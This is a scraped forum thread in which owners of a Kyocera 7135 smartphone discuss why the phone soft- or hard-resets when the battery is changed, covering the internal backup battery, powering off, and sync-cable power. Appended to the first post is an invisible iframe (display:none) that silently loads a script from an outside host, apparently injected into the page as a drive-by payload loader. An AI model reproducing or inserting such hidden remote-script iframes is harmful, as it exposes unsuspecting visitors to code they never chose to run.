+ Reply to Thread

Soft Reset when I change the battery

OK, I have searched the forums and the solution I found was to charge the phone in the cradle for 24 hours. I have done this and still every time I change the battery (less then 10 seconds) the phone resets. It is supposed to do this? Is there a fix I am unaware of? Thanks for any help!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    The Edge

Do you have the phone turned off when you're changing the battery?

It is supposed to soft reset when you change the battery. It is not supposed to hard reset when you change the battery.

Alan

Originally posted by Rambler
    Do you have the phone turned off when you're changing the battery?
    [QUOTE]Originally posted by Rambler

No I don't. Is it supposed to be off in order to charge the internal battery? From what I gleaned from my search, if the internal battery is charged the soft reset does not take place. That is not happening here.
    The Edge

[QUOTE]Originally posted by The Edge
    Originally posted by Rambler

No I don't. Is it supposed to be off in order to charge the internal battery? From what I gleaned from my search, if the internal battery is charged the soft reset does not take place. That is not happening here.
    If the internal battery is charged the HARD reset will not take place. The SOFT reset will ALWAYS take place when you change the battery. The manual says you should turn off the phone before changing the batteries (page 3 step 1 "With the phone turned off, use the stylus or your finger to open the battery compartment ......").

Alan

Originally posted by alanb
    If the internal battery is charged the HARD reset will not take place. The SOFT reset will ALWAYS take place when you change the battery. The manual says you should turn off the phone before changing the batteries (page 3 step 1 "With the phone turned off, use the stylus or your finger to open the battery compartment ......").

Alan
    OK. Got it. Thanks for straightening me out.
    The Edge

My phone was fully charged, I turned off the phone and then removed the battery. It did a hard reset. This never happened before and I don't think is suppose to happen. Any thoughts?

I've been told that you should never connect the phone to a computer with a sync cradle or data cable without having external power connected or it will kill the internal battery.

I don't know if you've ever done that with your phone or not.

The internal battery should keep the phone from doing a hard reset while you change batteries.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Administrator
    thats not completely true. the internal batt is used for keeping the apps and programs you have instaled in memory. hooking up the phone to a pc or data cable with no external power wont do anything but use battery juice when on. external power is recommended however in these instances because you dont want to lose a data call or isp connection if your phone batt dies...

An engineer at Kyocera is who told me about the problems they've had with that. I found out because I was asking him about using the usb cable to use the phone as a modem with my laptop when I'm sitting at the airport and not plugged into power. He's seen several dead phones caused by that. I'm not taking the risk.

Re: Soft Reset when I change the battery

Originally posted by The Edge
    OK, I have searched the forums and the solution I found was to charge the phone in the cradle for 24 hours. I have done this and still every time I change the battery (less then 10 seconds) the phone resets. It is supposed to do this? Is there a fix I am unaware of? Thanks for any help!
    You did not search hard enough. I have a solution (hinted at in some of the replies above, but no one spelled it out). I posted it a few days ago: http://www.smartphonesource.com/vbul...1239#post51239

Basically, plug the phone in directly (you can use the cable that plugs into the cradle to plug directly into the phone) and then do the battery swap. This solved my problems, not even a soft reset. One thing I do is I make sure that the phone recognizes the new battery and shows a full charge (instead of the empty one it shows from removing the old battery) before I remove the plug, to make sure it doesn't lose power suddenly.

Also, in regard to this:
    Originally posted by tmwebsites
    An engineer at Kyocera is who told me about the problems they've had with that. I found out because I was asking him about using the usb cable to use the phone as a modem with my laptop when I'm sitting at the airport and not plugged into power. He's seen several dead phones caused by that. I'm not taking the risk.
    The reason he is saying that is probably that if you are on low battery and do a sync and lose power during the sync, it is pretty bad. However, it generally isn't anything a hard reset, and another hot sync won't fix. I've aborted a bunch of hot syncs, and its usually caused me problems (hard resets required), but as long as you hotsync enough, and at one point I had to remove and reinstall a problem app (Docs2Go and Inbox2Go), everything should be fine. However, if you want to be really careful then leaving the cradle plugged in while you charge (which I only do 50% of the time) is okay, especially if your battery is low.

If the phone is off, changing the battery without AC power should not cause a reset.

If the phone is on, changing the battery without AC power will should cause a soft reset.

Administrator
    Originally posted by tmwebsites
    there is no risk to take. the only thing to worry about is to make sure you have enough battery power. ive used the 6035 many times with no external power connected when using the data cable (i.e. in the car traveling). if the 7135 is less stable than the 6035 (being it need external power to be used with the data cable), then ill stick to what i have...

Originally posted by marctronixx
    there is no risk to take. the only thing to worry about is to make sure you have enough battery power. ive used the 6035 many times with no external power connected when using the data cable (i.e. in the car traveling). if the 7135 is less stable than the 6035 (being it need external power to be used with the data cable), then ill stick to what i have...
    Could it be just that the 7135's power consumption levels are higher due to EN usage?? not to mention that the screen sucks more power than before.

What's contradictory is that a USB connection does provide a 5v power..probably not enough amps to power the device, but would be enough to supplement the EN power demands during usage or at least sustain the unit's memory from loss... of course they may not have designed the connection to utilize the usb power for this type of use.
    iPhone therefore iAm.

Administrator
    probably not utilized, i think you are right on the money with that. doesnt the data cable have the port for the external charger hookup?

Originally posted by dgelfuso
    If the phone is off, changing the battery without AC power should not cause a reset.

If the phone is on, changing the battery without AC power will should cause a soft reset.
    I did exactly that (phone off, change battery) and got a soft reset.
    The Edge

The data cable does have a port to hook up the external power.

The USB connection does not provide any power to charge the phone. I was told that there is a problem with the cable drawing down the power of the internal battery directly if the external power source is not used. I was told this is regardless if the main battery is charged or not.

I only mentioned this originally as a possible cause of the phone requiring a hard reset after changing the battery. I have not experienced that at all with my phone and have never hooked it up to the synch cradle without the power connected. My contact at Kyo was just warning me not to hook up the data cable without the external power connected to save me from killing the internal battery.